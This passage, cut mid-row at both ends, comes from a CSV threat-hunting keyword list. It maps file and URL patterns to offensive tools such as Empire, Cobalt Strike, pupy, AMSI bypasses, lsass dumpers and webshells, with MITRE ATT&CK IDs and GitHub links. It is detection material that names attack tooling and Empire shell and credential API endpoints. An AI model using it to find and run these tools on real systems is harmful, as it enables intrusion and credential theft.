T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/All_attack.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/allseeingeye-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/amass/wordlists*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/amqp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/amsi.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Amsi_Bypass_In_2023*,offensive_tool_keyword,Amsi_Bypass,Amsi Bypass payload that works on Windwos 11,T1055 - T1055.012 - T1562 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/senzee1984/Amsi_Bypass_In_2023,1,1,N/A,8,3,275,48,2023-07-30T19:17:23Z,2023-07-30T16:14:19Z -*/AMSI_patch.git*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*/Amsi-Killer.git*,offensive_tool_keyword,Amsi-Killer,Lifetime AMSI bypass,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Amsi-Killer,1,1,N/A,10,5,493,77,2023-09-26T00:49:22Z,2023-02-26T19:05:14Z -*/AmsiOpenSession.exe*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*/Analyzer-Session.log*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/AndrewSpecial.git*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*/android/pupydroid/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/ANGRYPUPPY.cna*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*/antak.aspx*,offensive_tool_keyword,nishang,Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang,T1583 T1595 T1190,N/A,N/A,N/A,POST Exploitation tools,https://github.com/samratashok/nishang/tree/master/Antak-WebShell,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*/anthemtotheego/CredBandit*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*/AntiSandbox.go*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*/AntiSandbox.go*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*/antx-code/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/antx-code/CVE-2022-0847,1,1,N/A,N/A,1,60,21,2022-03-08T09:14:25Z,2022-03-08T09:10:51Z -*/AoratosWin/*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,1,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*/APCLdr.*,offensive_tool_keyword,APCLdr,APCLdr: Payload Loader With Evasion Features,T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/NUL0x4C/APCLdr,1,1,N/A,N/A,3,285,51,2023-01-22T04:24:33Z,2023-01-21T18:09:36Z -*/api/admin/shutdown?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/*/kill?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/all/kill?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/all/shell?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/CXPLDTZCKFNT3SLT/shell?*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/stale?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/agents/XMY2H2ZPFWNPGEAP?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/listeners/all?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/modules/collection/*?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/modules/credentials*?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/reporting/agent/initial?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/reporting/msg/*?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/reporting/type/checkin?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/api/stagers/dll?token=*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - 